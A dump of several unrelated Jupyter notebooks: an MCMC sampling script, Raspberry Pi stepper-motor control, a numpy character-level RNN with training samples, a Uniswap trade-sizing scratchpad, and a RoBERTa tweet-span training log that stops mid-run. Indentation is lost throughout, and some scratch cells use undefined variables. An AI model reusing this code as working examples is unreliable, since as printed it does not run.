A.append(new_alpha)
accepted = accepted + 1.0
else:
A.append(old_alpha)
print("Acceptance rate = "+str(accepted/float(len(A))))
# Discard first half of MCMC chain and thin out the rest.
Clean = []
for n in range(len(A)//2,len(A)):
if (n % 10 == 0):
Clean.append(A[n][0])
# Print Monte-Carlo estimate of alpha.
print("Mean: "+str(np.mean(Clean)))
print("Sigma: "+str(np.std(Clean)))
plt.figure(1)
plt.hist(Clean, 30, histtype='step', lw=2)
#plt.xlim(2.3,2.358)
plt.xlabel(r'$\alpha$', fontsize=16)
plt.ylabel(r'$\cal L($Data$;\alpha)$', fontsize=16)
plt.show()
###Output
_____no_output_____ |
31_motor_control_intro.ipynb | ###Markdown
Simple Motor Control **Note: The wiring for this is very important. Please double-check your connections before proceeding.**
###Code
# Import GPIO Libraries
import RPi.GPIO as GPIO
import time
###Output
_____no_output_____
###Markdown
The pin configuration is dependent on the motor and wiring setup. The following code works for my current wiring setup with two motors and controllers (12V stepper motors and L293D H-Bridge driven with an 8 AA battery pack)
###Code
GPIO.setmode(GPIO.BCM)
coil_A_1_pin = 4
coil_A_2_pin = 5
coil_B_1_pin = 20
coil_B_2_pin = 21
GPIO.setup(coil_A_1_pin, GPIO.OUT)
GPIO.setup(coil_A_2_pin, GPIO.OUT)
GPIO.setup(coil_B_1_pin, GPIO.OUT)
GPIO.setup(coil_B_2_pin, GPIO.OUT)
#reverse_seq = ['1010', '0110', '0101', '1001']
reverse_seq = ['0101', '0110', '1010', '1001']
#reverse_seq = [ '1000','0010', '0100', '0001']
#reverse_seq = ['1100', '1010', '0110', '0101', '0011', '1010', '1001', '0101']
forward_seq = list(reverse_seq) # to copy the list
forward_seq.reverse()
forward_seq
def motor_forward(delay, steps):
for i in range(steps):
for step in forward_seq:
motor_set_step(step)
time.sleep(delay)
def motor_backwards(delay, steps):
for i in range(steps):
for step in reverse_seq:
motor_set_step(step)
time.sleep(delay)
def motor_set_step(step):
GPIO.output(coil_A_1_pin, step[0] == '1')
GPIO.output(coil_A_2_pin, step[1] == '1')
GPIO.output(coil_B_1_pin, step[2] == '1')
GPIO.output(coil_B_2_pin, step[3] == '1')
motor_set_step('0000')
delay = 5 # Time Delay (ms)
steps = 50
motor_forward(int(delay) / 1000.0, int(steps))
motor_backwards(int(delay) / 1000.0, int(steps))
# release the motor from a 'hold' position
motor_set_step('0000')
GPIO.cleanup()
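# A minimal sketch (an assumption, not part of the original run) of how to make the
# release + cleanup above robust to interruptions such as a KeyboardInterrupt:
# try:
#     motor_forward(delay / 1000.0, steps)
# finally:
#     motor_set_step('0000')  # release the coils
#     GPIO.cleanup()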
###Output
_____no_output_____ |
vanilla-char-rnn.ipynb | ###Markdown
Vanilla Recurrent Neural NetworkA character-level implementation of a vanilla recurrent neural network. Import dependencies
###Code
import numpy as np
import matplotlib.pyplot as plt
###Output
_____no_output_____
###Markdown
Parameters Initialization
###Code
def initialize_parameters(hidden_size, vocab_size):
'''
Returns:
parameters -- a tuple of network parameters
adagrad_mem_vars -- a tuple of mem variables required for adagrad update
'''
Wxh = np.random.randn(hidden_size, vocab_size) * 0.01
Whh = np.random.randn(hidden_size, hidden_size) * 0.01
Why = np.random.randn(vocab_size, hidden_size) * 0.01
bh = np.zeros([hidden_size, 1])
by = np.zeros([vocab_size, 1])
mWxh, mWhh, mWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why)
mbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad
parameter = (Wxh, Whh, Why, bh, by)
adagrad_mem_vars = (mWxh, mWhh, mWhy, mbh, mby)
return (parameter, adagrad_mem_vars)
###Output
_____no_output_____
###Markdown
Forward Propagation
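For reference, the forward pass below implements the standard vanilla-RNN recurrence (variable names match the code): $h_t = \tanh(W_{hh} h_{t-1} + W_{xh} x_t + b_h), \qquad A_t = \mathrm{softmax}(W_{hy} h_t + b_y)$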
###Code
def softmax(X):
    t = np.exp(X - np.max(X, axis=0))  # shift by the column-wise max for numerical stability (same output)
return t / np.sum(t, axis=0)
def forward_propogation(X, parameters, seq_length, hprev):
'''
Implement the forward propogation in the network
Arguments:
X -- input to the network
parameters -- a tuple containing weights and biases of the network
seq_length -- length of sequence of input
hprev -- previous hidden state
Returns:
caches -- tuple of activations and hidden states for each step of forward prop
'''
caches = {}
caches['h0'] = np.copy(hprev)
Wxh, Whh, Why, bh, by = parameters
for i in range(seq_length):
x = X[i].reshape(vocab_size, 1)
ht = np.tanh(np.dot(Whh, caches['h' + str(i)]) + np.dot(Wxh, x) + bh)
Z = np.dot(Why, ht) + by
A = softmax(Z)
caches['A' + str(i+1)] = A
caches['h' + str(i+1)] = ht
return caches
###Output
_____no_output_____
###Markdown
Cost Computation
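The cost below is the cross-entropy summed over all steps of the sequence: $\mathcal L = -\sum_{t=1}^{T} \sum_{k=1}^{V} y_{t,k} \log A_{t,k}$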
###Code
def compute_cost(Y, caches):
"""
Implement the cost function for the network
Arguments:
Y -- true "label" vector, shape (vocab_size, number of examples)
caches -- tuple of activations and hidden states for each step of forward prop
Returns:
cost -- cross-entropy cost
"""
seq_length = len(caches) // 2
cost = 0
for i in range(seq_length):
y = Y[i].reshape(vocab_size, 1)
cost += - np.sum(y * np.log(caches['A' + str(i+1)]))
return np.squeeze(cost)
###Output
_____no_output_____
###Markdown
Backward Propagation
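One step worth making explicit: since $h_t = \tanh(z_t)$ and $\tanh'(z) = 1 - \tanh^2(z)$, the backward pass converts $\partial\mathcal L/\partial h_t$ into $\partial\mathcal L/\partial z_t$ via the `dhraw` line in the code: $\frac{\partial \mathcal L}{\partial z_t} = \frac{\partial \mathcal L}{\partial h_t}\left(1 - h_t^2\right)$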
###Code
def backward_propogation(X, Y, caches, parameters):
'''
    Implement backpropagation through time
    Arguments:
    X -- one-hot encoded inputs of the sequence
    Y -- one-hot encoded true labels of the sequence
caches -- tuple containing values of `A` and `h` for each char in forward prop
parameters -- tuple containing parameters of the network
Returns
grads -- tuple containing gradients of the network parameters
'''
Wxh, Whh, Why, bh, by = parameters
dWhh, dWxh, dWhy = np.zeros_like(Whh), np.zeros_like(Wxh), np.zeros_like(Why)
dbh, dby = np.zeros_like(bh), np.zeros_like(by)
dhnext = np.zeros_like(caches['h0'])
seq_length = len(caches) // 2
for i in reversed(range(seq_length)):
y = Y[i].reshape(vocab_size, 1)
x = X[i].reshape(vocab_size, 1)
dZ = np.copy(caches['A' + str(i+1)]) - y
dWhy += np.dot(dZ, caches['h' + str(i+1)].T)
dby += dZ
dht = np.dot(Why.T, dZ) + dhnext
dhraw = dht * (1 - caches['h' + str(i+1)] * caches['h' + str(i+1)])
dbh += dhraw
dWhh += np.dot(dhraw, caches['h' + str(i)].T)
dWxh += np.dot(dhraw, x.T)
dhnext = np.dot(Whh.T, dhraw)
for dparam in [dWxh, dWhh, dWhy, dbh, dby]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
grads = (dWxh, dWhh, dWhy, dbh, dby)
return grads
###Output
_____no_output_____
###Markdown
Parameters Update
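The update rule below is Adagrad: each parameter accumulates its squared gradients and the step is scaled accordingly, $m \leftarrow m + g^2, \qquad \theta \leftarrow \theta - \eta\,\frac{g}{\sqrt{m + 10^{-8}}}$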
###Code
def update_parameters(parameters, grads, adagrad_mem_vars, learning_rate):
'''
Update parameters of the network using Adagrad update
Arguments:
paramters -- tuple containing weights and biases of the network
grads -- tuple containing the gradients of the parameters
learning_rate -- rate of adagrad update
Returns
parameters -- tuple containing updated parameters
'''
a = np.copy(parameters[0])
for param, dparam, mem in zip(parameters, grads, adagrad_mem_vars):
mem += dparam * dparam
param -= learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
return (parameters, adagrad_mem_vars)
###Output
_____no_output_____
###Markdown
Sample text from model
###Code
def print_sample(ht, seed_ix, n, parameters):
"""
Samples a sequence of integers from the model.
Arguments
ht -- memory state
seed_ix --seed letter for first time step
n -- number of chars to extract
parameters -- tuple containing network weights and biases
"""
Wxh, Whh, Why, bh, by = parameters
x = np.eye(vocab_size)[seed_ix].reshape(vocab_size, 1)
ixes = []
for t in range(n):
ht = np.tanh(np.dot(Wxh, x) + np.dot(Whh, ht) + bh)
y = np.dot(Why, ht) + by
p = np.exp(y) / np.sum(np.exp(y))
        ix = np.random.choice(range(vocab_size), p=p.ravel())  # sample rather than argmax so the generated text stays diverse (argmax is greedy and tends to loop)
x = np.eye(vocab_size)[ix].reshape(vocab_size, 1)
ixes.append(ix)
txt = ''.join(ix_to_char[ix] for ix in ixes)
print('----\n %s \n----' % txt)
def get_one_hot(p, char_to_ix, data, vocab_size):
'''
Gets indexes of chars of `seq_length` from `data`, returns them in one hot representation
'''
inputs = [char_to_ix[ch] for ch in data[p:p+seq_length]]
targets = [char_to_ix[ch] for ch in data[p+1:p+seq_length+1]]
X = np.eye(vocab_size)[inputs]
Y = np.eye(vocab_size)[targets]
return X, Y
###Output
_____no_output_____
###Markdown
Model
###Code
def Model(data, seq_length, lr, char_to_ix, ix_to_char, num_of_iterations):
'''
Train RNN model and return trained parameters
'''
parameters, adagrad_mem_vars = initialize_parameters(hidden_size, vocab_size)
costs = []
n, p = 0, 0
smooth_loss = -np.log(1.0 / vocab_size) * seq_length
while n < num_of_iterations:
if p + seq_length + 1 >= len(data) or n == 0:
hprev = np.zeros((hidden_size, 1)) # reset RNN memory
p = 0 # go from start of data
X, Y = get_one_hot(p, char_to_ix, data, vocab_size)
caches = forward_propogation(X, parameters, seq_length, hprev)
cost = compute_cost(Y, caches)
grads = backward_propogation(X, Y, caches, parameters)
parameters, adagrad_mem_vars = update_parameters(parameters, grads, adagrad_mem_vars, lr)
smooth_loss = smooth_loss * 0.999 + cost * 0.001
if n % 1000 == 0:
print_sample(hprev, char_to_ix['a'], 200, parameters)
print('Iteration: %d -- Cost: %0.3f' % (n, smooth_loss))
costs.append(cost)
hprev = caches['h' + str(seq_length)]
n+=1
p+=seq_length
plt.plot(costs)
return parameters
###Output
_____no_output_____
###Markdown
Implementing the model on a text
###Code
data = open('data/text-data.txt', 'r').read() # read a text file
chars = list(set(data)) # vocabulary
data_size, vocab_size = len(data), len(chars)
print ('data has %d characters, %d unique.' % (data_size, vocab_size))
char_to_ix = { ch:i for i,ch in enumerate(chars) } # maps char to it's index in vocabulary
ix_to_char = { i:ch for i,ch in enumerate(chars) } # maps index in vocabular to corresponding character
# hyper-parameters
learning_rate = 0.1
hidden_size = 100
seq_length = 25
num_of_iterations = 20000
parameters = Model(data, seq_length, learning_rate, char_to_ix, ix_to_char, num_of_iterations)
###Output
----
Schu
kwoj!wi nRA—— wj w .ycHrrhqagT:noh:ahvyqkSAnwpNtNTfpnk;hnnN
YIuprpNto:ThHYmcwdwYRYldcTaNmR
fkm!swem!
jnBqb iTIp,g,,v
qvw fkwS;g;!qmcBbicAlY;nbbIkwHYO:IsfhT :wl
—e!eI
.wwuoI—esSq—BOOcS
,mOyBIT;;u
----
Iteration: 0 -- Cost: 93.442
----
s wheng thert s dot bn,
B. wor TtoTar;
Had .asshThanb,
And as tha Telethabgas wberg penmerg te th;A,
Iy Sar me:
Thoudd herg d aberas and Then
Tnt ps waaverornasiactham!,
And bastevemer,r wing thitmth
----
Iteration: 1000 -- Cost: 68.503
----
veler anotrgr, ben,
I d agep had I clent there thallther iak lecI stok.
kere anis I shotheredint thavelest aseme way lealling per ais ay I dad
Ind baas tha siverged ia,
mar tredeelay,
And shadow tod
----
Iteration: 2000 -- Cost: 39.597
----
ksithet I bethathen betherusd we panted in a ore that fornind lowked bowd if bether keother waAna s wond themod the bess be he in trould woore as fir aiTh
And that Tas gre thathen boastougheramou the
----
Iteration: 3000 -- Cost: 22.733
----
gevelgarsing thes
Theniem
Thotroa to way,
Iedt bthe ind to ssy,
I shadowe kno dnas marsi
Tsher win oon toould now trn took the passing there
Had worn them really about the sas morn loodstoowing the te
----
Iteration: 4000 -- Cost: 11.318
----
d woads ind hewinr eng
I d way leavelena t—ng in the one in thewother, as just as for that the passingrt wen toows ay,
Iedt ow morn wt pe the better claim,
Back.
Oha d took the one less traved both
An
----
Iteration: 5000 -- Cost: 6.830
----
delling the traveled by len woore it lent that the passing there
Had worn them rhavesuho ben wit len wood,
And sorry I could notstr asshaithen the on the baps the bether corh bent in themu juh way lea
----
Iteration: 6000 -- Cost: 3.523
----
rre besep took beavellea by,
I sherdent the pit Inclaps sre pas graveler, the be owassed lot I soo
Thoughthom enghpa wavilge aive
Hac pin banr,
And he Tan
Tad gas owe in then ae
I s gratshacops theh a
----
Iteration: 7000 -- Cost: 4.619
----
nd ages hence:
Tso rowllong s morhaps the better claim,
Becaus in theh the one thalllouvish the in the aook the on the undergrowth;
shewans wans weer in ates hads wiverged in a yellow wood,
And tha
----
Iteration: 8000 -- Cost: 4.595
----
ss len len as trot troddyow yreasI wantes rnat hassy,
And en t ans ay In leakessharhads ohr cn bear;
And eors in bend t—e herher stous that mornith as for thaviverged in a yellow wood,
And sorry I do
----
Iteration: 9000 -- Cost: 2.303
----
g toode orl that morning equallyhea—ss way leads oir could notr;
And that has marsing this with a sigh
Somewhere ages and ages hence:
Two roads diverged in a yellow wood,
And sorry I coubd
Tore agss i
----
Iteration: 10000 -- Cost: 1.423
----
st as fair,
And having perhaps the better claim,
Because it was grassy and wanted wear;
Thoubd by,
And looked down one as far as I could
To where it bent in the undergrowth;
Then took the other, as j
----
Iteration: 11000 -- Cost: 0.915
----
share I—
I took the one less traveled by,
And that has mareishen
I challlas lasen ino ste traveler, look the one lllenithen has mirsin ans lookes dn way
In leaves n thet the pnd worn akep had tre th
----
Iteration: 12000 -- Cost: 0.672
----
get as I cops the passing thing in she beate
Talen that morrent ing hanted wear;
Though as for that the passing there
Had worn them really about the same,
And both that morning equally lay
In leaves
----
Iteration: 13000 -- Cost: 0.545
----
s firr ads that yh wanted waarn tookethea ben wood,
And having pe traveled by,
And that has marsing thirhaps the better claim,
Because it was grassy and worked dged wanteigrlenges I corhabem
The on to
----
Iteration: 14000 -- Cost: 0.471
----
nt be teelsherhept the passing that good the one less traveled by,
And that has maisith
And that has hais len bead wink on tood,eaubour air,
And wayd
Iges hadcld told,eduslero boad way lec way!
Yet Tw
----
Iteration: 15000 -- Cost: 0.426
----
s mareass woore in way
And both that morning equally lro the und th tond woollin with a sigh
Somewhere ages and ages hence:
Twough as fan traveled by,
And that has mar ing this with a sigh
Somewhere
----
Iteration: 16000 -- Cost: 6.138
----
ing and ages hence:
Two roads diverged in a yellow wood,
And sorn th wbeagel and way,
I doubted if I should ever aly Ih th w ynl and both that marling there
Had worn them really about the same,
And b
----
Iteration: 17000 -- Cost: 2.683
----
s mas merhith t morning equr way I could
Tore and aing ing thass ond both thet the better claim,
Because ing thaveler bing pass anin b abe the und worn woorsing horn lookst heages
Tokept the first for
----
Iteration: 18000 -- Cost: 1.299
----
d looked bout the pes it pe that morning equally lay
In leaves no step had trodden black.
Oh, I kept traver dtep had traveled by,
And that has marsithit the one traveler, long I stood
And looked down
----
Iteration: 19000 -- Cost: 1.071
|
notebooks/Trade Creation Example.ipynb | ###Markdown
$$ A \cdot B = C$$$$ (A+\Delta A) \cdot (B + \Delta B) = C$$$$ A \Delta B + B \Delta A + \Delta B \Delta A = 0$$ $$ \frac{A}{B} = R_{1}$$$$ \frac{A+\Delta A}{B + \Delta B} = R_{2}$$$$ A = B R_{1}$$$$ A+\Delta A = R_{2} [B + \Delta B]$$$$ B R_{1}+\Delta A = R_{2} [B + \Delta B]$$$$ \Delta A = B R_{2} + \Delta B R_{2} - B R_{1}$$ Substituting this $\Delta A$ into $A \Delta B + (B + \Delta B)\,\Delta A = 0$ gives: $$ A \Delta B + [B + \Delta B] \cdot [B R_{2} + \Delta B R_{2} - B R_{1}] = 0$$
###Code
rai_res / eth_res
true = 600  # reference RAI/ETH reserve ratio used below to cap the trade size
def agent_action(signal, s):
#Find current ratio
current_ratio = s['RAI_balance'] / s['ETH_balance']
eth_res = s['ETH_balance']
rai_res = s['RAI_balance']
#Find the side of the trade
if signal < current_ratio:
action_key = "eth_sold"
else:
action_key = "tokens_sold"
#Constant for equations
C = rai_res * eth_res
#Find the maximum shift that the trade should be able to sap up all arbitrage opportunities
max_shift = abs(rai_res / eth_res - true)
#Start with a constant choice of 10 eth trade
eth_size = 10
#Decide on sign of eth
    if action_key == "eth_sold":
eth_delta = eth_size
else:
eth_delta = -eth_size
#Compute the RAI delta to hold C constant
rai_delta = C / (eth_res + eth_delta) - rai_res
#Caclulate the implied shift in ratio
implied_shift = abs((rai_res + rai_delta)/ (eth_res + eth_delta) - rai_res / eth_res)
    #While the trade is too large, cut trade size in half
    while implied_shift > max_shift:
        #Cut trade in half and recompute the deltas so they track the smaller size
        eth_size = eth_size/2
        eth_delta = eth_size if action_key == "eth_sold" else -eth_size
        rai_delta = C / (eth_res + eth_delta) - rai_res
        implied_shift = abs((rai_res + rai_delta) / (eth_res + eth_delta) - rai_res / eth_res)
if action_key == "eth_sold":
I_t = s['ETH_balance']
O_t = s['RAI_balance']
I_t1 = s['ETH_balance']
O_t1 = s['RAI_balance']
delta_I = eth_delta
delta_O = rai_delta
else:
I_t = s['RAI_balance']
O_t = s['ETH_balance']
I_t1 = s['RAI_balance']
O_t1 = s['ETH_balance']
delta_I = rai_delta
delta_O = eth_delta
return I_t, O_t, I_t1, O_t1, delta_I, delta_O, action_key
s = {"RAI_balance": 4960695.994,
"ETH_balance": 7740.958682}
signal = 651.4802496080162
agent_action(signal, s)
eth_size
delta_I = uniswap_events['eth_delta'][t]
delta_O = uniswap_events['token_delta'][t]
action_key = 'eth_sold'
implied_shift
max_shift
(rai_res + rai_delta)/ (eth_res + eth_delta)
I_t, O_t, I_t1, O_t1, delta_I, delta_O, action_key
###Output
_____no_output_____ |
Model backlog/Train/236-Tweet-Train-5Fold-roBERTa reference HF no bias.ipynb | ###Markdown
Dependencies
###Code
import json, warnings, shutil
from scripts_step_lr_schedulers import *
from tweet_utility_scripts import *
from tweet_utility_preprocess_roberta_scripts_aux import *
from transformers import TFRobertaModel, RobertaConfig
from tokenizers import ByteLevelBPETokenizer
from tensorflow.keras.models import Model
from tensorflow.keras import optimizers, metrics, losses, layers
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
SEED = 0
seed_everything(SEED)
warnings.filterwarnings("ignore")
pd.set_option('max_colwidth', 120)
###Output
/usr/local/lib/python3.6/dist-packages/statsmodels/tools/_testing.py:19: FutureWarning: pandas.util.testing is deprecated. Use the functions in the public API at pandas.testing instead.
import pandas.util.testing as tm
###Markdown
Load data
###Code
# Unzip files
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_1.tar.gz'
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_2.tar.gz'
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_3.tar.gz'
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_4.tar.gz'
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_5.tar.gz'
database_base_path = COLAB_BASE_PATH + 'Data/complete_64_clean/'
k_fold = pd.read_csv(database_base_path + '5-fold.csv')
print(f'Training samples: {len(k_fold)}')
display(k_fold.head())
###Output
Training samples: 26882
###Markdown
Model parameters
###Code
vocab_path = COLAB_BASE_PATH + 'qa-transformers/roberta/roberta-base-vocab.json'
merges_path = COLAB_BASE_PATH + 'qa-transformers/roberta/roberta-base-merges.txt'
base_path = COLAB_BASE_PATH + 'qa-transformers/roberta/'
config = {
"MAX_LEN": 64,
"BATCH_SIZE": 32,
"EPOCHS": 7,
"LEARNING_RATE": 3e-5,
"ES_PATIENCE": 2,
"N_FOLDS": 5,
"question_size": 4,
"base_model_path": base_path + 'roberta-base-tf_model.h5',
"config_path": base_path + 'roberta-base-config.json'
}
with open(MODEL_BASE_PATH + 'config.json', 'w') as json_file:
json.dump(json.loads(json.dumps(config)), json_file)
###Output
_____no_output_____
###Markdown
Tokenizer
###Code
tokenizer = ByteLevelBPETokenizer(vocab_file=vocab_path, merges_file=merges_path,
lowercase=True, add_prefix_space=True)
###Output
_____no_output_____
###Markdown
Learning rate schedule
###Code
lr_min = 1e-6
lr_start = 0
lr_max = config['LEARNING_RATE']
train_size = len(k_fold[k_fold['fold_1'] == 'train'])
step_size = train_size // config['BATCH_SIZE']
total_steps = config['EPOCHS'] * step_size
warmup_steps = total_steps * 0.1
decay = .9985
rng = [i for i in range(0, total_steps, config['BATCH_SIZE'])]
y = [exponential_schedule_with_warmup(tf.cast(x, tf.float32), warmup_steps=warmup_steps, lr_start=lr_start,
lr_max=lr_max, lr_min=lr_min, decay=decay) for x in rng]
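# For reference, a minimal sketch of what `exponential_schedule_with_warmup` is
# assumed to do here (the real helper lives in scripts_step_lr_schedulers; this
# reconstruction is an assumption based on its arguments and the plot below):
# def exponential_schedule_with_warmup(step, warmup_steps, lr_start, lr_max, lr_min, decay):
#     if step < warmup_steps:
#         return lr_start + (lr_max - lr_start) * (step / warmup_steps)   # linear warmup
#     return max(lr_min, lr_max * decay ** (step - warmup_steps))         # exponential decay, floored at lr_min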
sns.set(style="whitegrid")
fig, ax = plt.subplots(figsize=(20, 6))
plt.plot(rng, y)
print("Learning rate schedule: {:.3g} to {:.3g} to {:.3g}".format(y[0], max(y), y[-1]))
###Output
Learning rate schedule: 0 to 2.96e-05 to 1e-06
###Markdown
Model
###Code
module_config = RobertaConfig.from_pretrained(config['config_path'], output_hidden_states=False)
def model_fn(MAX_LEN):
input_ids = layers.Input(shape=(MAX_LEN,), dtype=tf.int32, name='input_ids')
attention_mask = layers.Input(shape=(MAX_LEN,), dtype=tf.int32, name='attention_mask')
base_model = TFRobertaModel.from_pretrained(config['base_model_path'], config=module_config, name="base_model")
last_hidden_state, _ = base_model({'input_ids': input_ids, 'attention_mask': attention_mask})
logits = layers.Dense(2, name="qa_outputs", use_bias=False)(last_hidden_state)
start_logits, end_logits = tf.split(logits, 2, axis=-1)
start_logits = tf.squeeze(start_logits, axis=-1)
end_logits = tf.squeeze(end_logits, axis=-1)
model = Model(inputs=[input_ids, attention_mask], outputs=[start_logits, end_logits])
return model
###Output
_____no_output_____
###Markdown
Train
###Code
def get_training_dataset(x_train, y_train, batch_size, buffer_size, seed=0):
dataset = tf.data.Dataset.from_tensor_slices(({'input_ids': x_train[0], 'attention_mask': x_train[1]},
(y_train[0], y_train[1])))
dataset = dataset.repeat()
dataset = dataset.shuffle(2048, seed=seed)
dataset = dataset.batch(batch_size, drop_remainder=True)
dataset = dataset.prefetch(buffer_size)
return dataset
def get_validation_dataset(x_valid, y_valid, batch_size, buffer_size, repeated=False, seed=0):
dataset = tf.data.Dataset.from_tensor_slices(({'input_ids': x_valid[0], 'attention_mask': x_valid[1]},
(y_valid[0], y_valid[1])))
if repeated:
dataset = dataset.repeat()
dataset = dataset.shuffle(2048, seed=seed)
dataset = dataset.batch(batch_size, drop_remainder=True)
dataset = dataset.cache()
dataset = dataset.prefetch(buffer_size)
return dataset
AUTO = tf.data.experimental.AUTOTUNE
history_list = []
for n_fold in range(config['N_FOLDS']):
n_fold +=1
print('\nFOLD: %d' % (n_fold))
# Load data
base_data_path = 'fold_%d/' % (n_fold)
x_train = np.load(base_data_path + 'x_train.npy')
y_train = np.load(base_data_path + 'y_train.npy')
x_valid = np.load(base_data_path + 'x_valid.npy')
y_valid = np.load(base_data_path + 'y_valid.npy')
step_size = x_train.shape[1] // config['BATCH_SIZE']
# Train model
model_path = 'model_fold_%d.h5' % (n_fold)
model = model_fn(config['MAX_LEN'])
es = EarlyStopping(monitor='val_loss', mode='min', patience=config['ES_PATIENCE'],
restore_best_weights=True, verbose=1)
checkpoint = ModelCheckpoint((MODEL_BASE_PATH + model_path), monitor='val_loss', mode='min',
save_best_only=True, save_weights_only=True)
optimizer = optimizers.Adam(learning_rate=lambda: exponential_schedule_with_warmup(tf.cast(optimizer.iterations, tf.float32),
warmup_steps=warmup_steps, lr_start=lr_start,
lr_max=lr_max, lr_min=lr_min, decay=decay))
model.compile(optimizer, loss=[losses.CategoricalCrossentropy(label_smoothing=0.2, from_logits=True),
losses.CategoricalCrossentropy(label_smoothing=0.2, from_logits=True)])
history = model.fit(get_training_dataset(x_train, y_train, config['BATCH_SIZE'], AUTO, seed=SEED),
validation_data=(get_validation_dataset(x_valid, y_valid, config['BATCH_SIZE'], AUTO, repeated=False, seed=SEED)),
epochs=config['EPOCHS'],
steps_per_epoch=step_size,
callbacks=[checkpoint, es],
verbose=2).history
history_list.append(history)
# Make predictions
# model.load_weights(MODEL_BASE_PATH + model_path)
predict_eval_df(k_fold, model, x_train, x_valid, get_test_dataset, decode, n_fold, tokenizer, config, config['question_size'])
###Output
FOLD: 1
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6262 - tf_op_layer_Squeeze_loss: 2.2742 - tf_op_layer_Squeeze_1_loss: 2.3520 - val_loss: 3.8167 - val_tf_op_layer_Squeeze_loss: 1.9365 - val_tf_op_layer_Squeeze_1_loss: 1.8801
Epoch 2/7
672/672 - 174s - loss: 3.7654 - tf_op_layer_Squeeze_loss: 1.9037 - tf_op_layer_Squeeze_1_loss: 1.8617 - val_loss: 3.7637 - val_tf_op_layer_Squeeze_loss: 1.9123 - val_tf_op_layer_Squeeze_1_loss: 1.8514
Epoch 3/7
672/672 - 170s - loss: 3.6594 - tf_op_layer_Squeeze_loss: 1.8531 - tf_op_layer_Squeeze_1_loss: 1.8064 - val_loss: 3.7658 - val_tf_op_layer_Squeeze_loss: 1.9114 - val_tf_op_layer_Squeeze_1_loss: 1.8544
Epoch 4/7
Restoring model weights from the end of the best epoch.
672/672 - 170s - loss: 3.6206 - tf_op_layer_Squeeze_loss: 1.8334 - tf_op_layer_Squeeze_1_loss: 1.7872 - val_loss: 3.7652 - val_tf_op_layer_Squeeze_loss: 1.9133 - val_tf_op_layer_Squeeze_1_loss: 1.8519
Epoch 00004: early stopping
FOLD: 2
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6083 - tf_op_layer_Squeeze_2_loss: 2.2684 - tf_op_layer_Squeeze_3_loss: 2.3399 - val_loss: 3.8046 - val_tf_op_layer_Squeeze_2_loss: 1.9244 - val_tf_op_layer_Squeeze_3_loss: 1.8803
Epoch 2/7
672/672 - 174s - loss: 3.7481 - tf_op_layer_Squeeze_2_loss: 1.8970 - tf_op_layer_Squeeze_3_loss: 1.8511 - val_loss: 3.7555 - val_tf_op_layer_Squeeze_2_loss: 1.9004 - val_tf_op_layer_Squeeze_3_loss: 1.8551
Epoch 3/7
672/672 - 170s - loss: 3.6470 - tf_op_layer_Squeeze_2_loss: 1.8472 - tf_op_layer_Squeeze_3_loss: 1.7999 - val_loss: 3.7652 - val_tf_op_layer_Squeeze_2_loss: 1.9043 - val_tf_op_layer_Squeeze_3_loss: 1.8609
Epoch 4/7
Restoring model weights from the end of the best epoch.
672/672 - 170s - loss: 3.5984 - tf_op_layer_Squeeze_2_loss: 1.8224 - tf_op_layer_Squeeze_3_loss: 1.7760 - val_loss: 3.7736 - val_tf_op_layer_Squeeze_2_loss: 1.9088 - val_tf_op_layer_Squeeze_3_loss: 1.8648
Epoch 00004: early stopping
FOLD: 3
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6556 - tf_op_layer_Squeeze_4_loss: 2.2783 - tf_op_layer_Squeeze_5_loss: 2.3773 - val_loss: 3.8716 - val_tf_op_layer_Squeeze_4_loss: 1.9330 - val_tf_op_layer_Squeeze_5_loss: 1.9386
Epoch 2/7
